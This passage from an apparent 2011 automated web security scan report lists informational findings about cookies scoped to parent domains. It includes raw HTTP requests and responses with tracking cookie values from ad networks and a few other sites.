Set-Cookie: A3=gs35b0E.0ca7000009bExaZS0084o00002kYwuaZXq09MY00001h8evaYRd0bI400000lGhvb0Ah0cEt00003lp66b0xe0dMv00002kSEGaZWa03sY00001kPIlaZWa03sY00000kHgIb0v.02WG00001jem9a.2L0c7wa.2L1kFaLa.2L09EZ00001lEOyaYx40cie00001kLQDb0xt0cbO00001h4.ob0xr0ca700002eBxyaZST03iw00001h51Tb0yn0ca700002h51Sb0Ah0ca700001h4.pb0vz0ca700001lzuRa+WF0ckj00001l7XCa+WC08Y500001hePeb0wK0cbO00001lzuXb3sV0ckj00001leMha.2F06hH00001lkqFa.2B06hH00001lFP5aZRG0dSu00001kovFb0xt0cjc00002jDBSaZUd0cbS00001jmcDa.2B0c7w00001kSCsaZWb03sY00001l.wtb0wj07Nz00001jDCqa+WC0cbS00001jDDva+WC0cbS00001jmdZa.2F0c7w00001lGkWb0vy0cEt00001le66b1na02WG00001hePyb0xq0cbO00001gs36b0xr0ca700000lu2rb0yg04m400001iz3QaZRG0bnA00001iyQIaYRd0bnA00001; expires=Tue, 04-Oct-2011 07:21:39 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=78ox0000000001vcawTK0000000002vjatH70000000001vf990p0000000001v5anad0000000001vc835N0000000001vjajpm0000000001vcaJmE0000000001vcaKr10000000001vjaFbT0000000001vm9l7u0000000001vfajpn0000000000vcamoJ0000000001v58SCH0000000001vc9xv30000000001vf9xvo0000000001vc82MD0000000003vj838g0000000001vjafgy0000000001vf8n.z0000000000v99xv40000000001vfaAsi0000000001vf82MC0000000003vkaF580000000001vk9yJj0000000001vj82ME0000000000vj8SC30000000001v99u4N0000000002vjaF7y0000000002v8aHLh0000000002vs9i8L0000000001vf9.360000000001v8awPH0000000001vf838c0000000001vjaKr20000000003vk7dNF0000000001vj4ZUH0000000002vc90mq0000000001v5ajpj0000000001vc82MA0000000000vk; expires=Tue, 04-Oct-2011 07:21:39 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Wed, 06 Jul 2011 11:21:39 GMT
Connection: close
Content-Length: 2366

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

9.11. http://bstats.adbrite.com/adserver/behavioral-data/0 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bstats.adbrite.com
Path:	/adserver/behavioral-data/0

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ut="1%3AVZJJtoMgEEX3wtgB2KBmN4oabFCgVKIxe%2F80nn%2BS6T116z1K32iP0eONxvYwi24APRB0rDsvsuZ7Ly9y4UsDxhEU4mguoiuZJI5GEth6WKCf6%2BgB4xPtD9ru1sWpzL5hOtvJiReVh25X5Xdh44E%2BtbK7AOd0%2FtKy0Uatx8j4rXVUWM2IsgugU1PmQSMDUNOWWoXUpgggwS%2FqJuY4tFbbYEqbxDJRByBzsViFQd4GhajSK6LVodzcMffQupnioJTLq%2FBgWMKEmcTqlS0UU6o5bVNIJbmL9Rt3KSmF4V9RvhgJxTRj7r7wGsr6PgEvngpz6ab6M%2FuByy8ccm5E7AIovgPgqQ8WvqIKASJR7nqai%2FhKL%2BgiyOTiF4k5jAAdBh8nuH8pilBdzXOre%2F9joM%2FnDw%3D%3D"; path=/; domain=.adbrite.com; expires=Sat, 03-Jul-2021 15:39:06 GMT
vsd=0@2@4e14819a@view.atdmt.com; path=/; domain=.adbrite.com; expires=Fri, 08-Jul-2011 15:39:06 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/behavioral-data/0?d=48272602;bapid=12553;uid=1030306;neg=1 HTTP/1.1
Host: bstats.adbrite.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362027x0.066+1305478400x1093175211"; rb=0:684339:20838240:110:0:712156:20861280:1voofy6a0tk1w:0:712181:20838240:WH9qYld2QnJADW1dBwV4VAZUaXsQdQJCDV9iX1pP:0:742697:20828160:4325897289836481830:0:753292:20858400:AG-00000001389358554:0:762701:20861280:E3F32BD05A8DDF4D5646D79640088B:0:806205:20882880:9ed3f2f2-7f5a-11e0-a07a-00259009a9e4:0; cv="1%3Aq1ZyLi0uyc91zUtWslLKMM%2B1rEnPKzHNt0wsqTG2MixKzSgxsDK0MtDJSMoyqkkvyKoqTy5IrjG0MizJqyjIsDK1MszPq1CqBQA%3D"; srh="1%3Aq64FAA%3D%3D"; rb2=CiMKBjc0MjY5NxjY6J2rHyITNDMyNTg5NzI4OTgzNjQ4MTgzMAouCgY3NjI3MDEYva3q3iYiHkUzRjMyQkQwNUE4RERGNEQ1NjQ2RDc5NjQwMDg4QhAB; ut="1%3AVZJJtoMgEEX3wtgB2KBmN4oabFCgVKIxe%2F80nn%2BS6T116z1K32iP0eONxvYwi24APRB0rDsvsuZ7Ly9y4UsDxhEU4mguoiuZJI5GEth6WKCf6%2BgB4xPtD9ru1sWpzL5hOtvJiReVh25X5Xdh44E%2BtbK7AOd0%2FtKy0Uatx8j4rXVUWM2IsgugU1PmQSMDUNOWWoXUpgggwS%2FqJuY4tFbbYEqbxDJRByBzsViFQd4GhajSK6LVodzcMffQupnioJTLq%2FBgWMKEmcTqlS0UU6o5bVNIJbmL9Rt3KSmF4V9RvhgJxTRj7r7wGsr6PgEvngpz6ab6M%2FuByy8ccm5E7AIovgPgqQ8WvqIKASJR7nqai%2FhKL%2BgiyOTiF4k5jAAdBh8nuH8pilBdzXOre%2F9joM%2FnDw%3D%3D"; vsd=0@1@4e144551@bcp.crwdcntrl.net

Response

HTTP/1.1 200 OK
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: image/gif
Set-Cookie: ut="1%3AVZJJtoMgEEX3wtgB2KBmN4oabFCgVKIxe%2F80nn%2BS6T116z1K32iP0eONxvYwi24APRB0rDsvsuZ7Ly9y4UsDxhEU4mguoiuZJI5GEth6WKCf6%2BgB4xPtD9ru1sWpzL5hOtvJiReVh25X5Xdh44E%2BtbK7AOd0%2FtKy0Uatx8j4rXVUWM2IsgugU1PmQSMDUNOWWoXUpgggwS%2FqJuY4tFbbYEqbxDJRByBzsViFQd4GhajSK6LVodzcMffQupnioJTLq%2FBgWMKEmcTqlS0UU6o5bVNIJbmL9Rt3KSmF4V9RvhgJxTRj7r7wGsr6PgEvngpz6ab6M%2FuByy8ccm5E7AIovgPgqQ8WvqIKASJR7nqai%2FhKL%2BgiyOTiF4k5jAAdBh8nuH8pilBdzXOre%2F9joM%2FnDw%3D%3D"; path=/; domain=.adbrite.com; expires=Sat, 03-Jul-2021 15:39:06 GMT
Set-Cookie: vsd=0@2@4e14819a@view.atdmt.com; path=/; domain=.adbrite.com; expires=Fri, 08-Jul-2011 15:39:06 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Wed, 06 Jul 2011 15:39:06 GMT
Content-Length: 42

GIF89a.............!.......,........@..D.;

9.12. http://cang.baidu.com/do/add previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://cang.baidu.com
Path:	/do/add

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

BAIDUID=92E2D2F2A0513651099D245A96DCDBBE:FG=1; expires=Wed, 06-Jul-41 11:21:26 GMT; path=/; domain=.baidu.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /do/add?it=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&iu=http%3a%2f%2fsearch.microsoft.com%2fresults.aspx%3fq%3dpresspass+controls%26FORM%3dMSERRO%26mkt%3den-US&fr=ien&dc= HTTP/1.1
Host: cang.baidu.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:26 GMT
Server: apache 1.0.9.0
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Set-Cookie: BAIDUID=92E2D2F2A0513651099D245A96DCDBBE:FG=1; expires=Wed, 06-Jul-41 11:21:26 GMT; path=/; domain=.baidu.com
Content-Type: text/html
Cache-Control: no-cache
Connection: close
Content-Length: 7393

<?xml version="1.0" encoding="gb2312"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xh
...[SNIP]...

9.13. http://clk.atdmt.com/MRT/go/285207471/direct/01/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://clk.atdmt.com
Path:	/MRT/go/285207471/direct/01/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

ach00=903d/120af:6cf8/2750d:d99f/1afe8:bab9/11176:ba67/1c4e:f594/1c01f:66c2/39a1:66c2/3877; expires=Friday, 05-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
ach01=ce81a74/120af/134f208a/903d/4dd2907e:cf0807d/2750d/135a6ad5/6cf8/4de0ff1b:8a892c1/1afe8/bfedd64/d99f/4de0ffc1:a34fe32/11176/ab3574a/bab9/4de6e487:224f750/1c4e/4919ce6/ba67/4de6e67b:421378c/1c01f/825b020/f594/4de7e7e5:421378c/1c01f/8b4ca16/f594/4de7e7e7:421378c/1c01f/88b46ce/f594/4de7ecb3:c62bb85/39a1/123ee4af/66c2/4dfffb75:c388719/39a1/1235b344/66c2/4e008e93:c3ee9ca/3877/123ee6eb/66c2/4e008f9b; expires=Friday, 05-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /MRT/go/285207471/direct/01/ HTTP/1.1
Host: clk.atdmt.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Object moved
Cache-Control: no-store
Content-Length: 0
Expires: 0
Location: http://view.atdmt.com/action/atlasdmt_home
P3P: CP="NOI DSP COR CUR ADM DEV TAIo PSAo PSDo OUR BUS UNI PUR COM NAV INT DEM STA PRE OTC"
Set-Cookie: ach00=903d/120af:6cf8/2750d:d99f/1afe8:bab9/11176:ba67/1c4e:f594/1c01f:66c2/39a1:66c2/3877; expires=Friday, 05-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Set-Cookie: ach01=ce81a74/120af/134f208a/903d/4dd2907e:cf0807d/2750d/135a6ad5/6cf8/4de0ff1b:8a892c1/1afe8/bfedd64/d99f/4de0ffc1:a34fe32/11176/ab3574a/bab9/4de6e487:224f750/1c4e/4919ce6/ba67/4de6e67b:421378c/1c01f/825b020/f594/4de7e7e5:421378c/1c01f/8b4ca16/f594/4de7e7e7:421378c/1c01f/88b46ce/f594/4de7ecb3:c62bb85/39a1/123ee4af/66c2/4dfffb75:c388719/39a1/1235b344/66c2/4e008e93:c3ee9ca/3877/123ee6eb/66c2/4e008f9b; expires=Friday, 05-Jul-2013 00:00:00 GMT; path=/; domain=.atdmt.com
Date: Wed, 06 Jul 2011 11:40:44 GMT
Connection: close

9.14. http://d.p-td.com/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d.p-td.com
Path:	/r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=8496530639253255806; Domain=.p-td.com; Expires=Mon, 02-Jan-2012 11:21:57 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/dm/mkt/4/mpid//mpuid/4325897289836481830/mchpid/4/url/ HTTP/1.1
Host: d.p-td.com
Proxy-Connection: keep-alive
Referer: http://p.brilig.com/contact/bct?pid=14CFF267-5CAA-4454-864E-139B5E28A8FB&_ct=iframe&adid=3831&action=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=8496530639253255806

Response

9.15. https://ebanking.ubs.com/en/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://ebanking.ubs.com
Path:	/en/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

NavLB_EB=ebanking1.ubs.com; Domain=.ubs.com; Path=/; Version=1; HttpOnly

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

9.16. http://ib.adnxs.com/seg previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ib.adnxs.com
Path:	/seg

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

uuid2=3420415245200633085; path=/; expires=Tue, 04-Oct-2011 11:22:10 GMT; domain=.adnxs.com; HttpOnly
anj=Kfw))BAfzI)_c8i<lK#0Pn0I13%'hiiUjya]NePJuWIyt1!shO5+W]943^xjP-VZ[#v*7V*E?1lK7GeQXy%V*<X5zx]>^$7/zi5rMj5lo5_o3VW/ar7FCnRy^>>C7):gM6=r*i/#[pB=SYhiVs3JWW[xw:ivtn!CsFd61PLaw[[<DqkR$P4cs]+7urA@xYXfsUrZLg:tpzl70ZO)+geN%U1Z]J'4s!`?Xji#p[+yc]@WsXjaesPv3AskX__l1d??wa*+5K/WQa*kR$la!)<Cj'02sWS=WG$$j3>zgX=8EH4SDC8Z-/F4_'st9$`gbGQuBKVpBfqhdWwW5NR+e+3n_MG-%8`u(0RFuyB0hNX4N_h9>FBfLBgaO@U!Gj=YwrH[?*OaDXRY(Hwv_8g4-.'i+mf$4MZ5*Lu[ye43%+z'*x9d3!J]Y$0/b+I8#rbe^wI6`JMsCnw9mpb^XQti+CJ8i?LwtLX>!V1veMAp]t`?Io!t$TP6*l[-W63VEmULhD1hJwvnokI+S6BoE8JQ!2_3MZEa#HT#.Hl)7>`J58Yy*^ameq%S-i$R?fb>4xBPON5kf!5iIZ_YF(Z@q7ReF@c-%WXSTbieBIFN^Q7Ep91r0l#xmv*D<l<g)s3]t'#:x`sB80-wg+Rxj$'R8>9RF<xP+c1s!+(.c4w]6k*5mY:5<aZFNn7Z>)7d)0r7eYKtQxzBfVw0a:d$3Ns`+OctOR_)UV/oOWdU?CY_$S[Gl]_eLeT*cat-oSRicoEB.e1.C`tt-t'(UX_3nO6'[0_!>K(LiZ$plNwvB4`gM6t!v; path=/; expires=Tue, 04-Oct-2011 11:22:10 GMT; domain=.adnxs.com; HttpOnly

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /seg?add=105966 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/px?Yz0zNCZweGlkPTExNjgmcHhpZD01MzMmcHhpZD01NzY2JnB4aWQ9NTU2OCZweGlkPTYzOTMmcHhpZD01MyZweGlkPTI0NyZweGlkPTEyODYmcHhpZD01NzQ4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __ar_v4=ONY2QKBYMVD5FEFX2BR37K%3A20110628%3A2%7CXEXAP5HEBFET3JK734P3BR%3A20110628%3A1%7COBXRF4HH6JFXLDDVFSEQTM%3A20110628%3A1%7COZVXN65U6VG3BGSO7THUYQ%3A20110616%3A1%7CWRSB44J6LBBYHJ46YBYSXU%3A20110616%3A4%7C3FSLMUQHHZF3ZGSHGFBTCR%3A20110616%3A1%7CO5SUSHFLMFHUBPFB64PGTV%3A20110616%3A3%7CPM4V2RLCAZHMPP5I42UJOL%3A20110620%3A1%7CAG2H3EESGBBUTM6CFDP2IB%3A20110620%3A1%7CM5OOXYHITZA7XGIMSMOSWH%3A20110628%3A1; icu=ChIIvoIBEAoYASABKAEw3eiy8AQQ3eiy8AQYAA..; sess=1; uuid2=3420415245200633085; anj=Kfw))ByG5K)WgP%/zT#@:#8z-dUp)u]fwkNAf3WE5g%h%ksMZLow4G#V7_m:..iqG+b8]rH1.9<ktOde+dW=1iJ+Ar'n/Jw^sESpK8YPSkq')!p-gykgfN*Nur[3nJXya+Gmd486UM.Pm#'2N=*)ZaLb>@fJ1c#%)qL*oJoq0?!q:WwuOR=+o+0_Q_RWDtJ#gVm5)4<[`P/TTjh(s?Bw1EvKd+nb8sEFf=nnBmkoioWBp9)fb3AE#7d`e#P_F_muE!5Gb:-C6g<PYFc<c]BRSv#[Frf#FRzGk!_kjx1#$zVHqBa@YYuxdYm/8tto:XM?Mhe--/s09Y12!CeSFNR*/:>SPYuw2ftJID!)!vN!i[i8SR8swwOeo-'p%T42H(TOg!%w$1UJ_XK>nO:v#6isueX>9YlfuItK:x[60xq=gGzpNMNmpF29<N$IYh:bgLt^yAtpYT^qr(oscBbOe%XR:zc'v^/i0<VTlKRp8=O$.4-%bp#?B[XMsFivXc91M+qIjt:p8G(icTdxdu'snIh*.m*-EWc/SHSYmL!TMC1Lkob(Y*+(Zd*7D=h1z_kr>GJ_QDni<KP9l'uW7HPG'NJjK@Q9I<$k>A.rZvg.LgFR9kW0v?)_7A9)0xdK'c4#)-u'CsZGn?!Rjw6zWDal_u^`.CYU:LZdFchj/zZgN.(OA9BaccO@!`Mqu@Il%ADZf%UsNE[fpP#H_FUuTxRgh`3U$5p?43s#Jnb3cFRv<6TIN>fZHO>>LjO1l0#H.4>mB'pC0QO+gqS

Response

HTTP/1.1 302 Found
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Thu, 07-Jul-2011 11:22:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Tue, 04-Oct-2011 11:22:10 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: anj=Kfw))BAfzI)_c8i<lK#0Pn0I13%'hiiUjya]NePJuWIyt1!shO5+W]943^xjP-VZ[#v*7V*E?1lK7GeQXy%V*<X5zx]>^$7/zi5rMj5lo5_o3VW/ar7FCnRy^>>C7):gM6=r*i/#[pB=SYhiVs3JWW[xw:ivtn!CsFd61PLaw[[<DqkR$P4cs]+7urA@xYXfsUrZLg:tpzl70ZO)+geN%U1Z]J'4s!`?Xji#p[+yc]@WsXjaesPv3AskX__l1d??wa*+5K/WQa*kR$la!)<Cj'02sWS=WG$$j3>zgX=8EH4SDC8Z-/F4_'st9$`gbGQuBKVpBfqhdWwW5NR+e+3n_MG-%8`u(0RFuyB0hNX4N_h9>FBfLBgaO@U!Gj=YwrH[?*OaDXRY(Hwv_8g4-.'i+mf$4MZ5*Lu[ye43%+z'*x9d3!J]Y$0/b+I8#rbe^wI6`JMsCnw9mpb^XQti+CJ8i?LwtLX>!V1veMAp]t`?Io!t$TP6*l[-W63VEmULhD1hJwvnokI+S6BoE8JQ!2_3MZEa#HT#.Hl)7>`J58Yy*^ameq%S-i$R?fb>4xBPON5kf!5iIZ_YF(Z@q7ReF@c-%WXSTbieBIFN^Q7Ep91r0l#xmv*D<l<g)s3]t'#:x`sB80-wg+Rxj$'R8>9RF<xP+c1s!+(.c4w]6k*5mY:5<aZFNn7Z>)7d)0r7eYKtQxzBfVw0a:d$3Ns`+OctOR_)UV/oOWdU?CY_$S[Gl]_eLeT*cat-oSRicoEB.e1.C`tt-t'(UX_3nO6'[0_!>K(LiZ$plNwvB4`gM6t!v; path=/; expires=Tue, 04-Oct-2011 11:22:10 GMT; domain=.adnxs.com; HttpOnly
Location: http://cm.g.doubleclick.net/pixel?nid=appnexus1
Date: Wed, 06 Jul 2011 11:22:10 GMT
Content-Length: 0

9.17. http://idcs.interclick.com/Segment.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://idcs.interclick.com
Path:	/Segment.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734311&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293&8803=734323; domain=.interclick.com; expires=Tue, 06-Jul-2021 15:39:03 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Segment.aspx?sid=9787d0d4-9d7b-4605-985d-7786f61ba68e HTTP/1.1
Host: idcs.interclick.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/iaction/UMIRF_IE9_BOW_Final_InitialView_Home
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: T=1; uid=u=8fb5e3ac-83a3-4cca-8da7-7f2e4e96648c; sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734311&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293; tpd=e20=1311819163224&e90=1309831963205&e50=1311819163964&e100=1309831963322

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
Set-Cookie: sgm=9622=734271&9000=734271&570=734271&410=734271&846=734271&7472=734311&6790=734276&7434=734280&7594=734283&428=734285&11062=734293&11060=734293&8803=734323; domain=.interclick.com; expires=Tue, 06-Jul-2021 15:39:03 GMT; path=/
X-Powered-By: ASP.NET
P3P: policyref="http://www.interclick.com/w3c/p3p.xml",CP="NON DSP ADM DEV PSD OUR IND PRE NAV UNI"
Date: Wed, 06 Jul 2011 15:39:02 GMT

GIF89a.............!.......,...........D..;

9.18. http://js.revsci.net/gateway/gw.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://js.revsci.net
Path:	/gateway/gw.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

udm_0=MLv3NzMJZjpn3tsfwP0KOUz16+gnQCV8thMJiG9y0/Ny8RycOj5Ee7W6976f+6q5uEkCljxs8/kkfUBkYkyv8Z6yN0Nd4WTv6nXi+wXts6Wq9fr6i0BVdAbUIt5q/AIu1tFMoLa+s5ybvovc1/sBiFagcmNZNEVOe/GUhqpvMMfBuED2AAtbTPmHja7LcOz4agTWi1koiKCTVv3qzk/79Qe2uPaQ6S7kAtoomuw/f8LKElRxy0cr+w2LkZjOKbucdRZZ24QaRgKaY1AMwZ8CSy1q4Bj7frnr33+NAZ28K2eqWTRzqHhiemYOPzFThvMc/LKh+lxjqccKlpfLelX3klLEP/sLoQ0P6lQ6cdNVQb3x2dZu7Uos9MOBqUHAZBkGUV3WmZ+rBDbbykBkJ5ScL50YNQGZrrt/HsYLSFJ1iQJDtX0BBMQEhE9Bm6B8KTU2B/+Tl9/z5z97+8PbD0lxNA1yRZRhLlb5N+vXpOlVXGaet4LJUbUUroApU+zR8PD394xJmJO9uIGq3nczsCCgrviDk+wlwWBJxAe13ViEqMDGFqe/XYaHMLv4FfqGe9RDrkTiBsaURaU2tBuJuF4kcSjipIKo96BoAvnIgAQ5aQ6FMjFLmtDIaStvMYiow+kEShGdJz3hz2UWdehqqamV60647IIuCZ+2HMgzX1GZgTEwazFHHp14F2bopoWcS2XxRiPNuV43PLbWFQQYi4x8RbB7WZm3LZ5eAPFGPKP4lN/t3r6q2cvFC5xKH/C339zgf6wBbxY94vTIz3EVEmF37yH7WQ2IlDvlP5iqu6GwMlroZWZrWzZMhKjhXtVtLXnZKSEns45kweQXxc2zCs3qojoqj2qFHg4a001Z3yDllrXDwJAabHr5Wgc8y0BK/ofvDL7XHaSeEoljUxm9KkuLGCjfF1XYBkwuTVBNiJq8RqvSzK64qnZNRty5Q3h+StSof0aki+YNsomLdXGPiZWX83jCDKbTjSbj+hizDjviNSkx95cRiMmuryNaSdO05sUVi0qRJJJ9SmIHgtrm1PNCY2hXEpu1dsy5NhOU+gzwUFDzEHOsk2pWeFPfriTzXqIi4lN39TQllYCaGXn3ezQvFSjSIkIQwrkm6gBJ7gnTgRD6A5cOwIfQk9fSDSkvblZRDLqroqhO7bgYjuN+LcdM7Ve/43ZMpUERWhIMXfXy1aRrqf0LRfLalQrCDEjP9qJjlsKLTUkEX48QSaBB30VpKn8uFiU71y39ztY0ldEI6fKW0WZsvLi8RNNHwzwryegZdQNPqY3GCxrbPQglNmlJ/0AOv7efwM/lfzF+7EddIkVoJVC7/CnqGwbss3ro70EGZ/mHLDffQxKNs69LCdqfNz2d2IN/jFjEJIGfyu9hj+Y6Lz7/Aoq345+vsZJOQhUFmcZDdEjolfrv25Qs8YHoKtsd9x5OzwOMNHipu490I83yu94a7iWqDHgrR1yr/uMAvscudgUa3pQaYfusrPhHFl7VKw3dNYub5VjRz/zdMjAI8H/NhNVSkBt7UhNNkE91CvD5ucCHrIOsYwCTJ/k4LgHZO+JlPvGagrFzQG+/cazoZiKfk+Ww3aKjqgESDiv6pV05xqMO1JCtyp++YSQ0Fjk/q8DmQ3I694az4HJyeF0doaYqdgDTaemIgsk09TF0P3eY8qsFTdBqwFsRImeaUnZysTD9OAL/JihvJz1KIY9BLAr9MXTPdigmKhIA+N9hzv9imoMFmleig5A5x4f13nj0feG7vc77b2lf+9Hm5HyLNCOJjtCy8n1SLMSrosCmjbfKBA2fP1sWx3WrLZIf0ePVlA==; Domain=.revsci.net; Expires=Thu, 05-Jul-2012 14:00:43 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=K08784 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://techflash.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=f6600bc0a97556506df2daf333d9f1f4; NETSEGS_A09801=82f4957c1a652091&A09801&0&4e1ada42&0&&4df59bf8&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_I09839=82f4957c1a652091&I09839&0&4e1adc15&0&&4df58b38&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_E06560=82f4957c1a652091&E06560&0&4e1ee036&2&10654,10670&4df8474d&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_F07607=82f4957c1a652091&F07607&0&4e205ae3&9&10024,10124,10066,10080,10076,10085,10133,10143,10152&4dfac4be&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_D05509=82f4957c1a652091&D05509&0&4e22104b&0&&4dfc450c&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_J07717=82f4957c1a652091&J07717&0&4e2422d0&0&&4dfea8b0&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_G07608=82f4957c1a652091&G07608&0&4e256477&1&10002&4dfeaccb&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_A08721=82f4957c1a652091&A08721&0&4e282d57&0&&4e02b17f&1f1a384c105a2f365a2b2d6af5f27c36; NETSEGS_H07710=82f4957c1a652091&H07710&0&4e2e16fd&3&10055,10194,10534&4e07f4c5&1f1a384c105a2f365a2b2d6af5f27c36; 